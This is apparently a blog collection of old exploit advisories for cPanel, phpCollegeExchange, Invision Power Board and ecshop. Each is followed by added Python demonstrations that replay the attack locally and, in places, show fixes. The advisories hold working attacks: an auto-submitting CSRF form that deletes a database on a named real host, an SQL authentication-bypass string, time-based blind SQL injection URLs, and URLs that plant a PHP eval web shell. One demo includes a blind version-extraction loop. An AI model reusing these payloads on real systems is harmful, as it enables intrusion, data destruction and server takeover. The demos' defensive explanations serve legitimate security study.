Sep 14

Test Code:

[+] Info=======================================================

[-] Exploit Title: cPanel < 11.30.2 Multiple CSRF Vulnerabilities
[-] Author: Net.Edit0r
[-] Home : Black-HG.Org ~ h4ckcity.org
[-] Version: 11.30.2
[-] Software Link: http://cpanel.net
[-] Email : Black.hat.tm[at]Gmail[dot]Com / Net.Edit0r[at]att[dot]net
[-] Date : 27/08/2011
[-] CVE : N/A
[-] Video Demo : http://www.black-hg.org/Vedioz/cpanel.rar
[-] Thanks to : A.Cr0x & 3H34N & 4m!n & Cyrus & tHe.k!ll3r & Mr.XHat & Mikili

[+] Exploit=====================================================

[-]  Introduction :

cPanel versions below (and excluding) 11.30.2 are vulnerable to CSRF: a forged
request from a page the victim visits while logged in can change the account's
contact email address to one of the attacker's choosing (the PoCs below change
the contact address and delete a database). If security tokens and the referrer
security check have been turned off, every version is vulnerable regardless of
its number.

Note: You can use this vulnerability to do intelligent

[-]  Remote Delete Database

<html>
<head>
<title>Coded By #BHG</title>
</head>
<!-- the form is submitted automatically as soon as the victim loads the page -->
<body onload="document.forms.mainform.submit();">
<form method="post"
action="https://www.downloadpars.ir:2083/cpsess1461226313/frontend/x3/sql/deldb.html"
name="mainform" id="mainform">
        <h4>Delete Database</h4>
        <div class="highlight">
        <table cellpadding="3" cellspacing="0">
        <tr>
        <td><label for="dbname">Victim Database:</label></td>
        <!-- value="" must be filled with the name of the database to delete -->
        <td><input type="text" name="db" id="dbname" value="" style="width: 150px" /></td>
        </tr>
        <tr>
        <td> </td>
        <td><center><input type="submit" id="submit_dbname"
value="Delete Database" class="input-button" /></center></td>
        <td></td>
        </tr>
        </table>
        </div>
    </form>
</body>
</html>

[-]  Remote Change Cpanel Mail

<html>
<head>
<title>Coded By #BHG</title>
</head>
<body>
<form id="mainform" name="mainform"
action="https://www.downloadpars.ir:2083/cpsess8033607818/frontend/x3/contact/saveemail.html?email=">
<ul class="contact_form">

        <li class="contact_label">Change New Email Address</li>
        <!-- the address below is the one the victim's account will be switched to -->
        <li class="contact_input brd"><input id="email" name="email"
type="text" value="net.edit0r@gmail.com" size="40"
/></li>
        <li class="contact_label">The second address to receive
notifications</li>
        <li class="contact_input brd"><input id="second_email"
name="second_email" type="text" value="" size="40"
/></li>

        <li><strong>Contact Preferences</strong></li>

        <li class="contact_input"><input id="notify_disk_limit"
name="notify_disk_limit" type="checkbox" checked="checked" value="1"
/>Send notifications to your contact email address when you
are reaching your disk quota.</li>

        <li class="contact_input"><input id="notify_bandwidth_limit"
name="notify_bandwidth_limit" type="checkbox" checked="checked"
value="1" />Send notifications to your contact email address
when you are reaching your bandwidth usage limit.</li>

        <li class="contact_input"><input id="notify_email_quota_limit"
name="notify_email_quota_limit" type="checkbox" checked="checked"
value="1" />Send notifications to your contact email address
when one of your email accounts approaches or is over quota.</li>

        <li><input style="margin-top:10px" type="submit" id="submit-button"
class="input-button" value="Save" /></li>

</ul>
<br />

</form>
</body>
</html>
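The introduction says that switching off security tokens and the referrer check makes every cPanel version exploitable. The following added example (not code from the advisory or from cPanel) models those two defences on a hypothetical handler standing in for .../contact/saveemail.html and replays the "Remote Change Cpanel Mail" form against it with each check on and off. The host name, the form field name security_token and the request dicts are constructed for the demo.

```python
"""Added example; not code from the cPanel advisory or from cPanel itself.
It models the two defences the introduction mentions (the per-session
security token and the referrer check) on a hypothetical handler standing
in for .../contact/saveemail.html, then replays the 'Remote Change Cpanel
Mail' form against it.  Host name, field name 'security_token' and the
request dicts are constructed for the demo."""
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://www.downloadpars.ir:2083"   # victim's cPanel, as in the PoC URLs


class Session:
    """One logged-in cPanel user; the token is the per-session CSRF secret."""

    def __init__(self):
        self.security_token = secrets.token_hex(16)
        self.contact_email = "owner@example.com"


def origin_of(url):
    parts = urlsplit(url)
    return "%s://%s" % (parts.scheme, parts.netloc)


def save_email(session, request, check_token=True, check_referer=True):
    """Return 'updated', or the reason the request was refused.

    request = {"headers": {...}, "form": {...}} as the browser sends it.
    Either check can be switched off, mirroring the advisory's remark that
    disabling security tokens and the referrer check makes every version
    exploitable."""
    headers, form = request["headers"], request["form"]

    if check_referer:
        src = headers.get("Origin") or headers.get("Referer")
        # A form auto-submitted from another site arrives with that site's
        # origin (or none at all); only accept our own origin.
        if not src or origin_of(src) != SITE_ORIGIN:
            return "refused: bad or missing Origin/Referer"

    if check_token:
        # The attacker's page cannot read the victim's token, so it cannot
        # put it in the form; constant-time compare avoids timing leaks.
        if not hmac.compare_digest(form.get("security_token", ""), session.security_token):
            return "refused: missing or wrong security token"

    session.contact_email = form["email"]
    return "updated"


def replay():
    """Submit the PoC form with the checks on and off.  Returns a dict of
    outcomes plus the contact address left in the session at the end."""
    victim = Session()
    # The victim's browser attaches the cPanel session cookie on its own,
    # but the Origin is the attacker's site and the token is absent.
    csrf_post = {
        "headers": {"Origin": "http://attacker.example", "Cookie": "cpsession=..."},
        "form": {"email": "net.edit0r@gmail.com", "second_email": ""},
    }
    # The same form submitted from cPanel's own contact page.
    legit_post = {
        "headers": {"Origin": SITE_ORIGIN, "Cookie": "cpsession=..."},
        "form": {"email": "new@example.com", "security_token": victim.security_token},
    }
    outcomes = {
        "csrf, both checks on": save_email(victim, csrf_post),
        "csrf, token check off": save_email(victim, csrf_post, check_token=False),
        "csrf, referer check off": save_email(victim, csrf_post, check_referer=False),
        "csrf, both checks off": save_email(victim, csrf_post, False, False),
        "legit, both checks on": save_email(victim, legit_post),
    }
    return outcomes, victim.contact_email


if __name__ == "__main__":
    for name, result in replay()[0].items():
        print("%-26s %s" % (name, result))
```

Either check alone stops the forged post: the attacker's page cannot supply the victim's token, and its submission carries its own Origin (or none). Only with both off does the auto-submitted form go through, which is exactly the configuration the advisory warns about.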

Dec 13

Name              phpCollegeExchange
Vendor            http://phpcollegeex.sourceforge.net
Versions Affected 0.1.5c

Author            Salvatore Fresta aka Drosophila
Website           http://www.salvatorefresta.net
Contact           salvatorefresta [at] gmail [dot] com
Date              2009-12-11

X. INDEX

I.    ABOUT THE APPLICATION
II.   DESCRIPTION
III.  ANALYSIS
IV.   SAMPLE CODE
V.    FIX
VI.   DISCLOSURE TIMELINE

I. ABOUT THE APPLICATION

PhpCollegeExchange  is  a  full  fledged college community
website.

II. DESCRIPTION

This application is affected by many SQL injection security
flaws. In order to exploit them, magic_quotes_gpc (php.ini)
must be Off.
In this security advisory I report only some of the
vulnerable files.
I tested version 0.1.5c only; other versions may also be
vulnerable.

III. ANALYSIS

Summary:

A) Authentication Bypass
B) Multiple SQL Injection

A) Authentication Bypass

Using a SQL Injection in the login process,  a  guest  can
bypass the authentication.
In order to exploit it, magic_quotes_gpc must be Off.

Vulnerable code (functions.php):

....

function checkpass($handle,$pass){
  require_once($home."mysqlinfo.php");
  include("i_aeskey.php");
  // $handle is interpolated into the SQL string unescaped: SQL injection
  $query="SELECT AES_DECRYPT(password,'$AES_key') FROM users WHERE
(handle='$handle')";
  $result = mysql_query($query);

  if(mysql_num_rows($result))
  {
    if($r = mysql_fetch_array($result))
     {$dbpass=$r[0];}
     if($pass==$dbpass)
        {return 1;}

....

B) Multiple SQL Injection

Searchend.php is affected by multiple SQL injection issues
that  allow  a guest  to view reserved  information stored
into  the database.
The following  is an example  of vulnerable  code found in
searchend.php.

Vulnerable code (searchend.php):

....

$query = "SELECT * FROM Books";

if(isset($_POST['searchby'])){$searchby=$_POST['searchby'];}else{$searchby=$_GET['searchby'];}

switch($searchby){
....

case "Title"  :

$title = $_POST['searchquery'];
if(strlen($title)>2){
//check length at least 3 chars

// $title is interpolated into the LIKE pattern unescaped: SQL injection
$query .= " WHERE (title LIKE '%$title%') ORDER BY price";
$result = mysql_query($query);

....

Another SQL injection can be found in forgotpass.php. It can
be manipulated to send the password of a registered user to
an arbitrary email address, provided the AES key is known.

Vulnerable code:

....

if( isset($_POST["handle"]) ){

....

// $handle is interpolated unescaped: an injected UNION can replace the email column
$query="SELECT AES_DECRYPT(password,'$AES_key'), email FROM users
WHERE (handle='$handle')";
$result = mysql_query($query);

if(mysql_num_rows($result)){

  $r = mysql_fetch_array($result);

  $email = $r[1];
  $pass = $r[0];

  ....

  mail("$email", "Your Book Exchange Password", $emailcontent);

....

IV. SAMPLE CODE

A) Authentication Bypass

Username: -1') UNION ALL SELECT 'foo'#
Password: foo
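To see why that username and password pair passes checkpass(), the following added example (not code from the advisory or from phpCollegeExchange) rebuilds the query on SQLite and runs the payload through it, beside a parameterised version of the same check. The same string-context injection is what searchend.php's LIKE '%$title%' suffers from. Assumptions: SQLite has no AES_DECRYPT, so a toy stand-in is registered and the demo stores passwords as enc:<key>:<plain>; the users row and the key value are constructed for the demo, and MySQL's # line comment is emulated because SQLite does not know it.

```python
"""Added example, not code from the phpCollegeExchange advisory: the
checkpass() query of functions.php rebuilt on SQLite so the sample payload
(Username: -1') UNION ALL SELECT 'foo'#  /  Password: foo) can be watched
end to end, beside a parameterised version.  Assumptions: SQLite has no
AES_DECRYPT, so a toy stand-in is registered and the demo stores passwords
as 'enc:<key>:<plain>'; the users row and the key are constructed."""
import sqlite3

AES_KEY = "demo-key"   # stands in for $AES_key loaded from i_aeskey.php
BYPASS_HANDLE = "-1') UNION ALL SELECT 'foo'#"   # the advisory's sample username


def aes_decrypt_stub(blob, key):
    """Toy AES_DECRYPT: returns the plaintext only for the right key."""
    prefix = "enc:%s:" % key
    return blob[len(prefix):] if blob.startswith(prefix) else None


def open_db():
    con = sqlite3.connect(":memory:")
    con.create_function("AES_DECRYPT", 2, aes_decrypt_stub)
    con.execute("CREATE TABLE users (handle TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', ?)", ("enc:%s:s3cret" % AES_KEY,))
    return con


def rendered_query(handle):
    """The statement the vulnerable PHP builds: $handle pasted in unescaped."""
    return ("SELECT AES_DECRYPT(password,'%s') FROM users WHERE (handle='%s')"
            % (AES_KEY, handle))


def checkpass_vulnerable(con, handle, password):
    """Mirror of the PHP checkpass(): with magic_quotes_gpc off the attacker
    supplies the closing quote and paren, appends a UNION that yields 'foo'
    as the 'decrypted password', and comments out the original tail."""
    query = rendered_query(handle)
    # MySQL treats '#' as a line comment; SQLite does not, so emulate it to
    # keep the statement identical to what MySQL would execute.
    sql = query.split("#", 1)[0]
    rows = con.execute(sql).fetchall()
    if rows:
        dbpass = rows[0][0]
        if password == dbpass:
            return 1
    return 0


def checkpass_fixed(con, handle, password):
    """Bound parameters: the payload is compared as a literal handle and
    never becomes part of the statement text."""
    rows = con.execute(
        "SELECT AES_DECRYPT(password, ?) FROM users WHERE handle = ?",
        (AES_KEY, handle)).fetchall()
    return 1 if rows and password == rows[0][0] else 0


if __name__ == "__main__":
    con = open_db()
    print(rendered_query(BYPASS_HANDLE))
    print("vulnerable:", checkpass_vulnerable(con, BYPASS_HANDLE, "foo"))
    print("fixed:     ", checkpass_fixed(con, BYPASS_HANDLE, "foo"))
```

The first SELECT matches no handle, so the UNION's single row 'foo' becomes $dbpass and the supplied password "foo" compares equal; with the bound-parameter version the same input is just a username that does not exist.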

B) Multiple SQL Injection

A proof of concept can be found here:
http://poc.salvatorefresta.net/PoC-phpCollegeExchange.txt

V. FIX

No fix.

VI. DISCLOSURE TIMELINE

2009-12-11 Bug discovered
2009-12-11 Initial vendor contact
2009-12-11 Advisory Release

Dec 06

Version:

Invision Power Services Invision Power Board 2.3.6
Invision Power Services Invision Power Board 3.0.4

Description:

The attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Test:

http://www.example.com/?app=forums&module=moderate&section=moderate&f=1&do=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(15)%20--%20skip%20&auth_key=c4276b77602767228faa9760eb4a5abd

http://www.example.com/forum/?act=mod&f=1&CODE=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(16)%20--%20skip%20&auth_key=040c4a6e768d626b4c05a4bb0fbf315c
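Both URLs are time-based blind probes: the response stalls for sleep() seconds only when the guessed character of version() is right. The following added example (not from the Invision Power Board report or from IPB) drives that probe against an SQLite stand-in for the prune_move query so the side channel can be run offline. SQLite has neither sleep() nor version(), so both are registered as Python functions; the topics table, its columns and the query shape are assumptions made for the demo, and the guess is quoted ('5') because SQLite, unlike MySQL, does not compare text with an integer numerically.

```python
"""Added example, not from the Invision Power Board report: the
substr(version(),1,1)=5 AND sleep(N) probe from the URLs above, run
against an SQLite stand-in for the prune_move query.  sleep() and
version() are registered as Python functions; the topics table, its
columns and the query shape are assumptions made for the demo."""
import sqlite3
import time

DELAY = 0.3               # seconds the injected sleep() stalls (the URLs use 15 and 16)
FAKE_VERSION = "5.1.41"   # what the stand-in version() reports


def open_backend():
    con = sqlite3.connect(":memory:")
    con.create_function("sleep", 1, lambda n: time.sleep(n) or 0)  # MySQL sleep() returns 0
    con.create_function("version", 0, lambda: FAKE_VERSION)
    con.execute("CREATE TABLE topics (tid INTEGER, forum_id INTEGER, starter_id INTEGER)")
    con.executemany("INSERT INTO topics VALUES (?, ?, ?)", [(1, 1, 1), (2, 1, 2), (3, 1, 7)])
    return con


def prune_move_vulnerable(con, starter):
    """The 'starter' request parameter lands in the WHERE clause unquoted
    and unescaped; that is the injection point the two URLs exercise."""
    sql = "SELECT tid FROM topics WHERE forum_id=1 AND starter_id=%s" % starter
    return con.execute(sql).fetchall()


def probe_payload(position, char):
    """Same shape as the URLs.  AND binds tighter than OR, so the clause is
    (forum_id=1 AND starter_id=1 AND starter_id=1) OR (guess AND sleep());
    the sleep() only runs for rows where the left side is false and the
    guessed character is right."""
    return ("1 AND starter_id=1 OR substr(version(),%d,1)='%s' AND sleep(%s) -- skip"
            % (position, char, DELAY))


def timed_probe(con, position, char):
    """True if the response stalled, i.e. the guessed character is right."""
    t0 = time.monotonic()
    prune_move_vulnerable(con, probe_payload(position, char))
    return time.monotonic() - t0 >= DELAY * 0.8


def extract_version(con, length=6, charset="0123456789."):
    """Recover the first `length` characters of version(), one probe per
    guess; stops early if no character of the charset matches."""
    out = ""
    for pos in range(1, length + 1):
        for ch in charset:
            if timed_probe(con, pos, ch):
                out += ch
                break
        else:
            break
    return out


if __name__ == "__main__":
    con = open_backend()
    print("version() starts with:", extract_version(con))
```

A wrong guess returns in milliseconds and a right one stalls for at least one sleep() per non-matching row, so the attacker needs no visible output at all; the threshold DELAY * 0.8 leaves room for normal latency jitter, which on a real target means choosing a delay well above the server's usual response time, as the 15 and 16 second values in the URLs do.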

May 30

ecshop 2.6.2 Multiple Remote Command Execution Vulnerabilities

 ######################### Securitylab.ir ########################
# Application Info:
# Name: ecshop
# Version: 2.6.2
# Website: http://www.ecshop.com
#################################################################
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: info@securitylab[dot]ir & K4mr4n_st@yahoo.com
#################################################################
#===========================================================
# :: integrate.php ::
#
# if ($_REQUEST['act'] == 'sync')
# {
# $size = 100;
# ......
# $tasks = array();
# if ($task_del > 0)
# {
# $tasks[] = array('task_name'=>sprintf($_LANG['task_del'], $task_del),'task_status'=>'<span id="task_del">' . $_LANG['task_uncomplete'] . '<span>');
# $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 2";
# $del_list = $db->getCol($sql);//$del_list
# }
# if ($task_rename > 0)
# {
# $tasks[] = array('task_name'=>sprintf($_LANG['task_rename'], $task_rename),'task_status'=>'<span id="task_rename">' . $_LANG['task_uncomplete'] . '</span>');
# $sql = "SELECT user_name, alias FROM " . $ecs->table('users') . " WHERE flag = 3";
# $rename_list = $db->getAll($sql);//$rename_list
# }
# if ($task_ignore >0)
# {
# $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 4";
# $ignore_list = $db->getCol($sql);//$ignore_list
# }
# ....
# $fp = @fopen(ROOT_PATH . DATA_DIR . '/integrate_' . $_SESSION['code'] . '_log.php', 'wb');
# $log = '';
# if (isset($del_list))
# {
# $log .= '$del_list=' . var_export($del_list,true) . ';';
# }
# if (isset($rename_list))
# {
# $log .= '$rename_list=' . var_export($rename_list, true) . ';';
# }
# if (isset($ignore_list))
# {
# $log .= '$ignore_list=' . var_export($ignore_list, true) . ';';
# }
# fwrite($fp, $log);
# fclose($fp);
# $smarty->assign('tasks', $tasks);
# $smarty->assign('ur_here',$_LANG['user_sync']);
# $smarty->assign('size', $size);
# $smarty->display('integrates_sync.htm');
# }
#
#
# http://site.com/admin/integrate.php?act=sync&del_list=<?php%20eval($_POST[cmd])?>
# http://site.com/admin/integrate.php?act=sync&rename_list=<?php%20eval($_POST[cmd])?>
# http://site.com/admin/integrate.php?act=sync&ignore_list=<?php%20eval($_POST[cmd])?>
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################
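The three PoC URLs rely on a detail of the code above: the log file is written with no opening <?php tag, so whatever var_export() quotes into $del_list is echoed as HTML until PHP meets an open tag inside the value itself. The following added example (not code from the Securitylab.ir advisory or from ecshop) reproduces the string and array output of var_export(), builds the log file the way integrate.php does, and uses a small model of PHP's scanner to show which stretches of the file would execute. The assumption behind the PoC URLs is that ?del_list=... populates $del_list when no user row has flag = 2, so the database result never overwrites it; the sample values are constructed.

```python
"""Added example, not code from the Securitylab.ir advisory or from ecshop:
the log-writing step of integrate.php rebuilt in Python to show why a
request parameter that reaches $del_list turns data/integrate_<code>_log.php
into a web shell.  var_export() output for strings and arrays is
reproduced; the sample values are constructed for the demo."""


def php_var_export(value):
    """Subset of var_export(): a string, or a list of strings."""
    if isinstance(value, str):
        return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"
    body = "".join("  %d => %s,\n" % (i, php_var_export(v)) for i, v in enumerate(value))
    return "array (\n" + body + ")"


def build_log(del_list=None, rename_list=None, ignore_list=None):
    """What integrate.php fwrite()s: '$name=<var_export>;' fragments with
    no opening '<?php' tag in front of them."""
    log = ""
    for name, value in (("del_list", del_list), ("rename_list", rename_list),
                        ("ignore_list", ignore_list)):
        if value is not None:
            log += "$%s=%s;" % (name, php_var_export(value))
    return log


def build_log_hardened(**lists):
    """Minimal fix within the same design: start the file in PHP mode, so a
    '<?php' or '?>' inside the quoted string is string data, not a tag.
    Writing attacker-influenced data into a .php file under the web root
    is still a poor design; keeping it outside the web root is better."""
    return "<?php\n" + build_log(**lists)


def executable_segments(src):
    """Tiny model of how PHP scans a file: text outside <?php ... ?> is
    echoed, and once in PHP mode a '?>' inside a single-quoted string does
    not leave it (only '...' strings and backslash escapes are modelled).
    Returns the code stretches PHP would execute."""
    segs = []
    i, n = 0, len(src)
    while i < n:
        start = src.find("<?php", i)
        if start < 0:
            break
        j, in_str = start + 5, False
        while j < n:
            c = src[j]
            if in_str:
                if c == "\\":
                    j += 2          # skip the escaped character
                    continue
                if c == "'":
                    in_str = False
            elif c == "'":
                in_str = True
            elif src.startswith("?>", j):
                break
            j += 1
        segs.append(src[start:j])
        i = j + 2
    return segs


PAYLOAD = "<?php eval($_POST[cmd])?>"   # the value in the PoC URLs

if __name__ == "__main__":
    for contents in (build_log(del_list=["alice", "bob"]),
                     build_log(del_list=PAYLOAD),
                     build_log_hardened(del_list=PAYLOAD)):
        print(repr(contents), "->", executable_segments(contents))
```

With a genuine user list the file contains no open tag and nothing runs; with the PoC value, var_export()'s single quotes are inert because the file is still in HTML mode when the embedded <?php is reached, so eval($_POST[cmd]) executes on every request to the log file. Prefixing the file with <?php keeps the same value inside a string literal, where neither the inner <?php nor the ?> has any effect.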